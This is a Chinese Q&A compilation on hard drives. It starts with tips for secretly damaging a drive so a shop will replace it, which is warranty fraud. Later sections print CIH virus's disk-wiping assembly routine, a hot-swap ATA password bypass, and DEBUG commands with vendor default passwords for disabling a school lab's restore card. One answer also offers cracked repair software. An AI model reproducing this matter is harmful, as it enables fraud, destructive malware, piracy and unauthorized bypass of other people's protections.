本文目录一览:
- 1、如何能迅速破坏硬盘,详情如下:
- 2、怎样破解硬盘密码?
- 3、硬盘怎么物理破坏
- 4、物理加密的移动硬盘密码忘记了,能不能有什么办法解锁..?
- 5、请发 HDD Regenerator(硬盘物理坏道修复工具) v1.71或1.61破解版,我的邮箱993563479@qq.com
- 6、怎样破解硬盘密码,简单的方法求大神帮助
如何能迅速破坏硬盘,详情如下:
复制来的。自己看把
具体几个办法
1 拿硬盘狂摇。。嘿嘿,几个钟头下来就差不多了
2找个垃圾电源,copy几个几G的文件包,在硬盘上不停的copy和del,不长时间也可以
3 用棉被包起来,狠摔。别叫看出来了(这个是以前伙计去换波导手机的办法)
4 找些DM之类的低格软件。使劲的弄,很快的
4 网上有一个牛人做的软件,它可以往硬盘的任意一簇上(注意他就是往一个点上)写数据,据说每秒钟达到近千万次。一块硬盘不到两分钟就能写出一个不可修复的坏道。多来几次的话。。。
5 把硬盘上下各夹一本厚点的书放平,用拳头狠狠的2拳就够了,这样你拿去商家用专业的软件都检测不过的,不然的话他给你把坏的隔离掉说没有什么问题
6 带电状态下,短路硬盘上的线路,绝对 OVER
有想换硬盘的可以试下,哈哈!
另附上CIH病毒破坏硬盘原理和方法..有兴趣找个CIH老病毒来玩是个很省事的方法.
CIH对硬盘破坏之完全剖析
IOS_SendCommand是Win95的一个非常底层的VXD调用,通常是用作对IO设备的低层
操作,如:读,写,加锁,格式化等等。一般情况下只能在Ring 0和虚拟机中使用,在普通
程序中使用会有不可预料的后果!该VXD调用的功能很多,也很繁杂。参数数量很少,只有
BCB或IOR和BDD或DCB的地址。但这几个数据结构却包含了大量的信息,结构也相当的复杂
。CIH病毒只用到了IOR结构,它包含了近二十个数据,但主要用到的就是IOR_func,IOR_s
tatus,IOR_flags,IOR_start_addr[2],IOR_xfer_count,IOR_buffer_ptr,IOR_req_re
q_handle,IOR_req_vol_handle,IOR_sgd_lin_phys,IOR_num_sgds,IOR_vol_designtr!
IOS_SendCommand的调用方法是:
mov esi, CmdData ; address of BCB or IOR
mov edi, DevData ; address of BDD or DCB
VxDCall IOS_SendCommand
IOR的完整定义为:
typedef struct _IOR {
ULONG IOR_next; // client link; see below
USHORT IOR_func; // function; see below
USHORT IOR_status; // request status; see below
ULONG IOR_flags; // request flags; see below
CMDCPLT IOR_callback; // address of callback; see below
ULONG IOR_start_addr[2]; // starting address; see below
ULONG IOR_xfer_count; // # of sectors/bytes; see below
ULONG IOR_buffer_ptr; // client buffer; see below
ULONG IOR_private_client; // BlockDev/IOS client reserved
ULONG IOR_private_IOS; // reserved space for IOS
ULONG IOR_private_port; // private area for port driver
union urequestor_usage _ureq; // requestor usage; see below
ULONG IOR_req_req_handle; // request handle; see below
ULONG IOR_req_vol_handle; // media handle; see below
ULONG IOR_sgd_lin_phys; // first physical SGD; see below
UCHAR IOR_num_sgds; // number of physical SGDs
UCHAR IOR_vol_designtr; // drive letter; see below
USHORT IOR_ios_private_1; // reserved by IOS to force alignment
ULONG IOR_reserved_2[2]; // reserved for internal use
} IOR, *PIOR;
CIH病毒先构造一个IOR,再使用IOS_SendCommand调用,完成IOR所指定的功能。
病毒在IOR中的IOR_flags中指示要写的设备为物理设备(IORF_PHYS_CMD),同步调用(IORF
_SYNC_COMMAND),即在写操作完成之后才返回。然后指定第一次写的位置为0(IOR_start_a
ddr[2]即0柱面0面0扇区,即主引导区),每次写入2048个字节(IOR_xfer_count),第一次
为物理硬盘一(IOR_vol_designtr=80h),需要写入的东西放在内存0c0001000h(IOR_buffe
r_ptr),这个地址是无所谓的,目的只是要随便写一大串无关数据到硬盘上,只要该地址不
是指向不存在的内存空间即可。最后CIH调用IOS_SendCommand,完成一次写操作!操作完
成后,先判断状态(IOR_status),看是否有该设备是否正常,是则每次2048字节的一直写
下去。如果写完一个硬盘(不太可能)或出错则把IOR_vol_designtr+1使之指向下一个物理
硬盘!
程序注释如下:
; ***************************
; * Kill All HardDisk *
; ***************************************************
; * IOR Structure of IOS_SendCommand Needs *
; ***************************************************
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
; ***************************************************
;0001为写功能IOR_WRITE
;40000501h为IOR_flags=1000000000000000000010100000001
;IORF_PHYS_CMD|IORF_VERSION_002|IORF_SYNC_COMMAND|IORF_HIGH_PRIORITY
;IORF_PHYS_CMD指示为物理设备
;IORF_SYNC_COMMAND指示为同步命令(操作完成后才返回)
;IORF_VERSION_002指示为扩展BCB(IOR)格式的IO请求
;IOR_start_addr[2]=00 00 00 00 00 00 00 00起始位置
(注意:不是扇区,而是字节)为0
;IOR_xfer_count=800h写入2048个字节
;IOR_buffer_ptr=0c0001000h要写的内容在地址0c0001000h
;IOR_vol_designtr=80h为第一个物理硬盘81h为第二个
KillHardDisk:
xor ebx, ebx
mov bh, FirstKillHardDiskNumber
push ebx
sub esp, 2ch
push 0c0001000h
mov bh, 08h
push ebx
push ecx
push ecx
push ecx
push 40000501h
inc ecx
push ecx
push ecx
mov esi, esp
sub esp, 0ach
;以压栈的形式构造IOR(就是上面那一大串数据)
LoopOfKillHardDisk:
int 20h
dd 00100004h ;调用 IOS_SendCommand
cmp word ptr [esi+06h], 0017h
;IOR_status=17h=IORS_NO_DEVICE设备正常
否?
je KillNextDataSection ;写下一块
ChangeNextHardDisk:
inc byte ptr [esi+4dh]
;下个硬盘,80h为第一个物理硬盘81h为第二个
jmp LoopOfKillHardDisk ;继续杀杀杀!!!!
KillNextDataSection:
add dword ptr [esi+10h], ebx
;下个区域(以800h为一块)
mov byte ptr [esi+4dh], FirstKillHardDiskNumber
;第一个物理硬盘80h
jmp LoopOfKillHardDisk ;继续杀杀杀!!!!
CIH病毒发作时,先破坏Flash Memory,随后就是硬盘。有些计算机在Flash Memo
ry被破坏后就完全当机了。那要恭喜你,你的硬盘不会有太大的损失。因为Flash Memory
中装有非常重要的程序和信息如BIOS,一旦破坏,机器完全死掉的可能性相当大。既然当
掉了,程序很可能执行不到杀硬盘的模块或执行一会儿便完全死机。你的硬盘就会有相当
大的可能恢复!但是,如果病毒程序运行顺利,正如上面程序所示的,它会每次2048个字
节的从主引导区开始写硬盘。直到分区引导区,主目录表,文件分配表,数据区......直
至写完整个硬盘。然后再开始杀第二个物理硬盘。是不是太黑了!这只是CIH病毒程序所预
计的理想情况,毕竟每次写2048个字节还是比较慢。普通一个上GB的硬盘,一个柱面有63
个扇区,要写完主引导区所在的0柱面0面的63个扇区也要花点时间!如果继续写下去,破
坏掉一些Win95正常运行所必须的一些文件数据,就很可能当机,这时,绝大都数人都会
Reset。这样的话,你就很有可能保存了相当部分地硬盘数据!这就是被CIH破坏了的硬盘
有可能用软件修复的真正原因!但千万不要以为那些软件的功能很强,足以修复所有硬盘
。硬盘的关键数据丢失太多的话,任何人都没有办法。所以修复概率很大程度上是依赖你
在病毒发作后关机的时间!时间越短,丢失的数据越少,修复的可能就越大!如果只有主
引导区被覆盖,那修复的可能有100%。如果分区引导区被覆盖,那修复的可能有99%。主
目录表被覆盖修复的可能有,但要手动恢复。如果文件分配表被覆盖,几乎不可能修复。
如果数据区被覆盖,那就彻底没有希望了!实际的情况还要复杂一些,通常是顺序的数据
丢失。
综上所述,CIH病毒对硬盘的破坏是逻辑的,是极据破坏性的!一旦破坏,修复的
可能性较小。一旦发作,要尽快的重起或关机,尽量减少损失!在奉劝各位一句,千万不要
在没有把握的情况下,把以上程序编译执行,那将导致非常严重的后果!其实要达到以上
怎样破解硬盘密码?
此方法简便,可解全部各类型硬盘密码!!
详细步骤
1、找相同好硬盘一块
2、用好硬盘进MHDD,用PWD进入加密状态,到输入密码的地方
3、不断电,直接用要解密的盘体(无电路板)换掉好盘体
4、输入密码
5、解除密码(用unlock,dispwd)
解除成功,OK!
不成功的原因,盘不一样,热换的时候电路板短路,板没接触好。
多试几次就会成功!
硬盘密码
hehe 硬盘密码分user和master2种,加密等级有2种,高级和最高级,master密码可以解除user密码,一般的
硬盘有通用master密码,如果加user高级密码,不断电,硬盘没被锁定,可以直接重加密解除,如果断电,硬盘
被锁定,拒绝读写数据区,固件区仍可以操作,如修改容量,读fw等操作.用HDDL或pc3k的密码选项,直接输入
master密码,可以解除(部分厂家的硬盘的master是空或厂名).笔记本和MHDD及HDLOCK类加的都是user的高
级密码,MHDD加的是明文,HDLOCK加的是密文,如果pc3k支持这种硬盘,可以直接进入相应选项查看和清除密
码,没这个选项,就读出fw,用软件修改里面的内容!
对维修硬盘没什么用途的硬盘安全模式的相关知识。
安全模式功能设置是一个特别有用的安全特征,有了设备锁定密码,用户可以防止非授权的存取硬盘资料
,即使把硬盘拆到其他计算机上。
以前的帖子说了一些操作码,具体是:(括号内是操作码)
安全密码设置SSP:(F1H)11110001
安全解锁SU:(F2H)11110010
密码主动删除SEP:(F3H)11110011
单元删除SEU:(F4H)11110100
冻结锁定SFL:(F5H)11110101
取消密码SDP:(F6H)11110110
安全模式仅限于IDE硬盘,SCSI硬盘不支持这些操作码。
密码有用户密码和主控密码,可以同时设置也可以单独设置。一般建议同时设置且不要相同。
主控密码可以由制造商或者销售商或者管理员等通过SSP(F1H)命令设置,设置主控密码不需要进入锁定
状态。
用户密码由使用用户自己设置,设置了用户密码后,在硬盘下次加电后会自动进入锁定模式。
安全模式有三种:锁定模式,解锁模式,冻结模式。
锁定模式:硬盘加电后不允许执行介质存取命令操作,除非使用SU(F2H)命令或者SEU(F4H)命令。
解锁模式:允许所有的介质存取命令操作,如果没有设置密码,加电后设备一般就会进入这个模式,否则
平时带电的时候就需要使用SU(F2H)或者SEU(F4H)命令进入该模式。
冻结模式:除了那些能够改变锁定功能及设置改变密码的功能指令外允许所有的磁盘操作,通过SFL(F5H
)命令可以进入该模式,除了关电不可能退出这个冻结模式。
安全级别有两种:高级别安全和最大级别安全。
高级别安全:硬盘被锁定到这个功能后忘记了用户密码,可以用主控密码来解除锁定。
最大级别安全:硬盘被锁定到这个功能后忘记了用户密码,只能使用主控密码和SEU(F4H)命令来解除,
但是用户数据会被删除。
为了安全起见,硬盘解锁命令有尝试限制,一般默认是5次(看厂商设定),当解锁尝试计数器到达5时,
设备识别信息的字128的第4位(解锁尝试位)将被置位。SEU(F4H)命令和SU(F2H)命令就会被终止。
硬盘复位或者重新加电还可以重新尝5试,硬盘复位或者重新加电后,设备识别信息的字128的第4位(解
锁尝试位)将被清除。
MHDD命令详解
PWD:给硬盘加USER密码,最多32位,什么也不输入表示取消。被锁的硬盘完全无法读写,低格、分区等一切读写操作都无效。如果加密码成功,按F2键后可以看到Security一项后面有红色的ON。要注意,设置完密码后必须关闭电源后在开机才会使密码起作用;
UNLOCK:对硬盘解锁。先选择0(USER),再正确输入密码。注意:选择1(Master)无法解开密码。
DISPWD:解除密码,先选择0(USER),再正确输入密码。在用DISPWD之前必须先用UNLOCK命令解锁。要注意,除了用UNLOCK和DISPWD命令可以解密码之外,没有任何办法可以解锁。而且一旦将密码遗忘(或输入错误),也没有任何办法可以解锁。如果解密码成功,按F2键后可以看到Security一项后面有灰色的OFF。注意:选择1(Master)无法解开密码。
硬盘怎么物理破坏
法一:泡水,注意尽量用脏水。如果拆过机械硬盘的话应该知道硬盘的碟片时需要保证清洁的,所以把硬盘丢到脏水里面之后,水可以破坏硬盘的许多结构,而里面的脏东西可以让这个过程效果更好,所以直接把硬盘丢到拖地之后的水桶里面应该是一个不错的选择。
方法二:拆开后用火烧,注意不要整个烧,拆散了均匀火烤。简单来说就是生一把火,把硬盘拆开后把碟片扔进去。虽然可能会闻到硬盘的香气,但是考虑到安全问题,这里不推荐使用需要加热食品的设备来做。
方法三:拆开后用刀片在此片上划出一道半径,多划几道比较保险。用刀子划不仅可以破坏硬盘上的数据,如果比较严重的话还会影响磁头的工作,另外这里还是不建议用切菜的刀来划。
物理加密的移动硬盘密码忘记了,能不能有什么办法解锁..?
现在解决这个问题最简单的方法就是看能否这个软件的作者和客服联系上,看有没有什么有效的解决办法。
还是建议您以后再给U盘或者移动硬盘加密的时候选择专业的U盘和移动硬盘加密软件。
U盘超级加密3000是一款专业的U盘和移动硬盘加密软件,可以加密任意文件夹,并且支持硬盘加密。
U盘超级加密3000操作简单,免安装,只要下载U盘超级加密3000到您指定的U盘和移动硬盘就可以了。
看我的回答您是否满意,如果满意的话,请推荐一下。
请发 HDD Regenerator(硬盘物理坏道修复工具) v1.71或1.61破解版,我的邮箱993563479@qq.com
硬盘再生器(HDD Regenerator)1.61汉化免注册破解版+1.71汉化注册版(附带本版唯一注册码,本注册码不适合官方版本)
已发送,请查收!
如果收件箱没有,请看你的
广告邮件
垃圾邮件
订阅邮件
其他邮件等!
如满意,请选择我回答下方的满意答案按钮!
糯米手机团
怎样破解硬盘密码,简单的方法求大神帮助
方法一: 开机时(也就是在你曾经进入cmos的时刻),同时按住ctrl+home,这样你就进入了 还原卡的密码输入窗口,只要输入正确的密码即可获得admin,以后随你怎样设置. 关于是密码的问题:一般还原卡都有默认密码的,默认密码怎么找,很简单,到网上搜索QQ:9750406 关键词"还原卡"就行了,找到你用的那个牌子的还原卡,进入站点,在一个比较偏僻的角落 一般可以找到默认密码的. 而一般机房管理员是不会修改其默认密码的,比如俺学校的 台湾远志牌的还原卡的默认密码是12345678, 小哨兵的是manager, 机房管理员一个也没改,好爽!!!!!!!!!! 不过我可没破坏任何东东,一旦惹怒了俺,嘿嘿....俺也不会破坏的, 恶意破坏计算机就是对自己的不尊重!!!! 如果管理员把密码改了呢?那就拿出宝刀--- 方法二: 此法实施过程看起来挺麻烦,不过熟悉了*作起来超不过15秒的- 高手sinister曰: 其实所谓硬盘保护卡就是在ROM中写了一段HOOK INT 13的程序,屏蔽了 一些功能调用如AH=3,5等,在中断向量表中INT 13的SEG,OFFSET 描述为[13h*4+2],[13h*4],将此中的程序先保存后,再替换为自己的代码, 当你AH=2的时,它便会call原始INT 13地址来完成*作. 只要找到原始INT 13入口便可以为所欲为. 不知看了这段感觉如何?慢慢消化吧. 主要矛盾:关键是要找到原始的int 13入口. 测试*作系统:win98 测试对象: 台湾远志还原卡 测试地点: 学校机房 测试目的: 控制还原卡,但不破坏. 注:本篇文章不对其实施过程中出现的任何不可预料的情况负责!!!!! 具体过程如下: 开机过程按住F8键,进入纯dos环境, 注";"后为注释. 出现提示符c:, 键入c:\\debug, - a100 - xor ax,ax - int 13 - int3 ; 寻找原始的int 13入口. 然后输入t回车,不断的重复,直到显示的地址形如 F000:xxxx ,后面的指令为:mov dl,80 (练练眼力-。按q退出. 记下这一地址, 在(0:13H*4)=0:4cH 处填入这个地址。 例如俺的得到的地址是F000:9A95 再次运行debug ,键入: -e 0:4c 95 9A 00 F0 ;e的作用将数据表"95 9A 00 f0",写入地址0:4c开始的字节中. -q 注: 填的时候要仔细,填错的话会死机。ok,破解完成. 这时在提示符c:\\键入 c:\\win 进入win98系统即可,那么这次你在win98系统中的一切*作,随着下一次 的启动都会被还原卡存储起来。 不过下一次进入系统的的时候,你还是需要重写地址0:4c,才可以让还原卡存储你的东东。 这时只需要在纯dos下进入debug,键入 -e 0:4c 95 9A 00 F0 -q 即可。 哈哈。。。这样也挺好,只有你才是这台computer的真正的主人 -。 别人还是受还原卡的限制的except--you 。 下面是找Int13入口的方法,我常用的几种: 1。手工运行Debug,最好在纯DOS下: Debug - a100 - xor ax,ax 注意: 前面要加上功能号以选择Int13H内部的流程,避免进入其他不经过原始入口的流程 - int 13 - int3 然后输入t回车,不断的重复,直到显示的地址形如 F000:xxxx。记下这一地址,按q 回车退出。 这里假设了第一个F000:xxxx就是要找的入口,实际上可以在第2,3,4,。。。。出现,要自己判断一下,通常认为就是第一个。在(0:13H*4)=0:4cH 处填入这个地址。 例如得到的地址是F000:1234 运行debug -e 0:4c 34 12 00 F0 =======把得到的原始入口填入Int13H的中断向量表 -q 注意: 填的时候要仔细,填错的话会死机。有些经过针对性处理的机器,要进一步鉴别。 如在Int13内部调用Int1ch. 如果在trace过程中发现如下代码 CMP DL,80[意思是判断是否针对硬盘操作] ,可以尝试修改成不存在的硬盘号,比如改成CMP DL,FF。其他的都不要修改. 试试 硬盘可写吗?如果可以的话就万事大吉了。另外,不能在Windows的虚拟DOS窗口中使用这种方法。 如果在Windows的虚拟DOS窗口运行的话,请使用下一种方法。 2。Debug - s F000:0 ffff 80 fa 80 强行搜索BIOS区,通过比较入口代码找到原始入口点 你可能会发现有好几处。根据我的多次破解经验,通常这个地址在F000:8000以后。 试验一下: 如果U F000:xxxx地址后发现代码类似 -u F000:xxxx PUSHF CMP DL,80 JZ .... . . . [有些不是这样,要注意鉴别。] 的话,填入向量表试试。通常破解就完成了。 我曾经发现经过以上中断还原后,仍不能写盘,或者死机的情况。经跟踪发现Int8H,Int 1CH,Int15H等向量对 Int13H进行了向量保护。解决办法:把Int8H,Int1cH,Int15H 也改会原始中断点(也是BIOS中断)。尝试写盘成功 如果想获得保护卡密码的话,可以参考以下步骤: 1。找到Int13h原始点设回中断向量表。 2。读出MBR 3,分析读出的MBR,找到密码算区和加密算法 4,推算出密码